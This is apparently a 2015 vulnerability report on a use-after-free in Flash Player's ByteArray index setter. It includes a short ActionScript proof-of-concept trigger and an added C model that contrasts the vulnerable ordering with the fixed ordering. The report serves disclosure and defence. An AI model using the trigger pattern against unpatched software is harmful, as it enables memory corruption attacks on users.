There is a use-after-free in the ByteArray operator []. If a byte array index
is set to a value with valueOf defined, this method gets called. If valueOf
contains code that frees the array's backing memory, such as setting its length,
this leads to a use-after-free: the write goes to the original ByteArray buffer,
which has already been freed, rather than to the newly allocated one. A PoC is as follows:
    for (var i = 0; i < 1000; i++) {
        var b = new ByteArray();
        b.length = 12;
        var n = new myba(b);
        b[0] = n;   // index set triggers n.valueOf(), which resizes b
    }
In the myba class definition:
    prototype.valueOf = function()
    {
        b.length = 1000;        // reallocates b's buffer, freeing the original
        bb = new ByteArray();
        bb.length = 12;         // new 12-byte allocation
        return 77;              // value the operator [] then stores
    }
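The ordering defect the report describes, reduced to a small C model (an added example, not Flash Player's code): a setter caches the buffer pointer, then converts the assigned value, and conversion runs script-controlled code that can reallocate the buffer. The names ByteArray, Value, set_index_vulnerable and set_index_fixed are assumptions for this illustration. The vulnerable path detects the stale pointer and skips the write instead of performing it, so the demo stays well-defined; the fixed path converts first and re-reads the buffer pointer and length afterwards, which is the general mitigation for any setter that runs a callback mid-operation.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of a script-visible byte array. */
typedef struct {
    uint8_t *data;
    size_t length;
} ByteArray;

/* A value being assigned; may carry a valueOf-style conversion callback. */
typedef struct {
    int plain;
    int (*value_of)(ByteArray *ba, void *ctx);
    void *ctx;
} Value;

/* Resize by allocating a new buffer and freeing the old one. Any pointer
 * cached before this call now dangles. */
static int ba_set_length(ByteArray *ba, size_t n)
{
    uint8_t *p = calloc(n ? n : 1, 1);
    if (!p)
        return -1;
    size_t keep = n < ba->length ? n : ba->length;
    if (keep)
        memcpy(p, ba->data, keep);
    free(ba->data);
    ba->data = p;
    ba->length = n;
    return 0;
}

/* Convert the assigned value to an integer; runs script code if present. */
static int to_int(ByteArray *ba, const Value *v)
{
    return v->value_of ? v->value_of(ba, v->ctx) : v->plain;
}

/* Vulnerable ordering: pointer and bounds are taken before conversion.
 * Returns 1 if the cached pointer no longer matches the live buffer (the
 * real bug would write into freed memory here), -1 on bounds error, 0 ok. */
int set_index_vulnerable(ByteArray *ba, size_t i, const Value *v)
{
    uintptr_t cached = (uintptr_t)ba->data;   /* cached before callback */
    size_t cached_len = ba->length;
    int n = to_int(ba, v);                    /* may free ba->data */
    if ((uintptr_t)ba->data != cached)
        return 1;                             /* stale: would be a UAF */
    if (i >= cached_len)
        return -1;
    ba->data[i] = (uint8_t)n;
    return 0;
}

/* Fixed ordering: convert first, then read the current buffer and length. */
int set_index_fixed(ByteArray *ba, size_t i, const Value *v)
{
    int n = to_int(ba, v);                    /* callback runs here */
    if (i >= ba->length)                      /* checked against live state */
        return -1;
    ba->data[i] = (uint8_t)n;                 /* fresh pointer */
    return 0;
}

/* valueOf callback mirroring the PoC: grow the array to 1000, return 77. */
static int grow_value_of(ByteArray *ba, void *ctx)
{
    (void)ctx;
    ba_set_length(ba, 1000);
    return 77;
}

/* Runs b[0] = obj with the growing valueOf. Returns 1 when the vulnerable
 * path detects the dangling pointer, the stored byte (77) for the fixed
 * path, or -1 on error. */
int demo(int use_fixed)
{
    ByteArray ba = { NULL, 0 };
    if (ba_set_length(&ba, 12) != 0)
        return -1;
    Value v = { 0, grow_value_of, NULL };
    int rc = use_fixed ? set_index_fixed(&ba, 0, &v)
                       : set_index_vulnerable(&ba, 0, &v);
    int result = (rc == 0) ? ba.data[0] : rc;
    free(ba.data);
    return result;
}

int main(void)
{
    printf("vulnerable ordering: %d (1 = stale pointer detected)\n", demo(0));
    printf("fixed ordering: %d (byte stored at index 0)\n", demo(1));
    return 0;
}
```

The check `(uintptr_t)ba->data != cached` is only there to make the demo safe to run; the actual fix is the reordering in set_index_fixed, and a sanitizer build (ASan) is the practical way to catch the vulnerable ordering in real code.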
A swf file and an as file are attached.
This bug is subject to a 7-day disclosure deadline, as the issue is being exploited in the wild. If 7 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Original issue reported on code.google.com by natashe...@google.com on 1 Jul 2015 at 9:09